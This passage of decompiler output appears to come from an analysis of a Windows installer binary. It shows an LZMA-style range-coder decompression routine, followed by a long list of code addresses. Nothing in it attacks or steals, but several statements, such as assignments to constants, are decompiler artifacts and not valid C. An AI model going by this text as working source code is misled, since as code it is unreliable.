														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												__eflags =  *(__ebp - 0x40) - 1;
												if( *(__ebp - 0x40) != 1) {
													__eax =  *(__ebp - 0x24);
													 *(__ebp - 0x80) = 0x16;
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x28);
													 *(__ebp - 0x24) =  *(__ebp - 0x28);
													__eax =  *(__ebp - 0x2c);
													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
													__eax = 0;
													__eflags =  *(__ebp - 0x38) - 7;
													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
													__al = __al & 0x000000fd;
													__eax = (__eflags >= 0) - 1 + 0xa;
													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x664;
													__eflags = __eax;
													 *(__ebp - 0x58) = __eax;
													goto L69;
												}
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 8;
												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t259 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t259;
												0 | _t259 = _t259 + _t259 + 9;
												 *(__ebp - 0x38) = _t259 + _t259 + 9;
												goto L76;
											case 0xa:
												goto L0;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												goto L88;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												goto L69;
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t613 - 0x88) = _t533;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t613 - 0x88) = _t533;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L80;
											case 0x1b:
												L76:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t275 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t275;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t284 = __ebp - 0x64;
												 *_t284 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t284;
												 *( *(__ebp - 0x68)) = __cl;
												L80:
												 *(__ebp - 0x14) = __edx;
												goto L81;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L81:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t535 = _t534 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}













                                                        0x00000000
                                                        0x00406d13
                                                        0x00406d13
                                                        0x00406d17
                                                        0x00406d24
                                                        0x00406d2e
                                                        0x00000000
                                                        0x00406d19
                                                        0x00406d19
                                                        0x00406d54
                                                        0x00406d57
                                                        0x00406d5a
                                                        0x00406d5d
                                                        0x00406d5d
                                                        0x00406d60
                                                        0x00406d67
                                                        0x00406d6c
                                                        0x00406c4d
                                                        0x00406c50
                                                        0x00406fc2
                                                        0x00406fc2
                                                        0x00406fc2
                                                        0x00406fc5
                                                        0x00406fc5
                                                        0x00406fc5
                                                        0x00406fcb
                                                        0x00406fd1
                                                        0x00406fd7
                                                        0x00406ff1
                                                        0x00406ff4
                                                        0x00406ffa
                                                        0x00407005
                                                        0x00407007
                                                        0x00406fd9
                                                        0x00406fd9
                                                        0x00406fe8
                                                        0x00406fec
                                                        0x00406fec
                                                        0x00407011
                                                        0x00000000
                                                        0x00000000
                                                        0x00407013
                                                        0x00407017
                                                        0x004071c6
                                                        0x004071dc
                                                        0x004071e4
                                                        0x004071eb
                                                        0x004071ed
                                                        0x004071f4
                                                        0x004071f8
                                                        0x004071f8
                                                        0x00407023
                                                        0x0040702a
                                                        0x00407032
                                                        0x00407035
                                                        0x00407038
                                                        0x00407038
                                                        0x0040703e
                                                        0x0040703e
                                                        0x004067da
                                                        0x004067da
                                                        0x004067da
                                                        0x004067e3
                                                        0x00000000
                                                        0x00000000
                                                        0x004067e9
                                                        0x00000000
                                                        0x004067f4
                                                        0x00000000
                                                        0x00000000
                                                        0x004067fd
                                                        0x00406800
                                                        0x00406803
                                                        0x00406807
                                                        0x00000000
                                                        0x00000000
                                                        0x0040680d
                                                        0x00406810
                                                        0x00406812
                                                        0x00406813
                                                        0x00406816
                                                        0x00406818
                                                        0x00406819
                                                        0x0040681b
                                                        0x0040681e
                                                        0x00406823
                                                        0x00406828
                                                        0x00406831
                                                        0x00406844
                                                        0x00406847
                                                        0x00406853
                                                        0x0040687b
                                                        0x0040687d
                                                        0x0040688b
                                                        0x0040688b
                                                        0x0040688f
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x0040687f
                                                        0x0040687f
                                                        0x00406882
                                                        0x00406883
                                                        0x00406883
                                                        0x00000000
                                                        0x0040687f
                                                        0x00406859
                                                        0x0040685e
                                                        0x0040685e
                                                        0x00406867
                                                        0x0040686f
                                                        0x00406872
                                                        0x00000000
                                                        0x00406878
                                                        0x00406878
                                                        0x00000000
                                                        0x00406878
                                                        0x00000000
                                                        0x00406895
                                                        0x00406895
                                                        0x00406899
                                                        0x00407145
                                                        0x00000000
                                                        0x00407145
                                                        0x004068a2
                                                        0x004068b2
                                                        0x004068b5
                                                        0x004068b8
                                                        0x004068b8
                                                        0x004068b8
                                                        0x004068bb
                                                        0x004068bf
                                                        0x00000000
                                                        0x00000000
                                                        0x004068c1
                                                        0x004068c7
                                                        0x004068f1
                                                        0x004068f7
                                                        0x004068fe
                                                        0x00000000
                                                        0x004068fe
                                                        0x004068cd
                                                        0x004068d0
                                                        0x004068d5
                                                        0x004068d5
                                                        0x004068e0
                                                        0x004068e8
                                                        0x004068eb
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00406930
                                                        0x00406936
                                                        0x00406939
                                                        0x00406946
                                                        0x0040694e
                                                        0x00406fc2
                                                        0x00406fc2
                                                        0x00000000
                                                        0x00000000
                                                        0x00406905
                                                        0x00406905
                                                        0x00406909
                                                        0x00407154
                                                        0x00000000
                                                        0x00407154
                                                        0x00406915
                                                        0x00406920
                                                        0x00406920
                                                        0x00406920
                                                        0x00406923
                                                        0x00406926
                                                        0x00406929
                                                        0x0040692e
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00406fc5
                                                        0x00406fc5
                                                        0x00406fcb
                                                        0x00406fd1
                                                        0x00406fd7
                                                        0x00406ff1
                                                        0x00406ff4
                                                        0x00406ffa
                                                        0x00407005
                                                        0x00407007
                                                        0x00406fd9
                                                        0x00406fd9
                                                        0x00406fe8
                                                        0x00406fec
                                                        0x00406fec
                                                        0x00407011
                                                        0x00000000
                                                        0x00000000
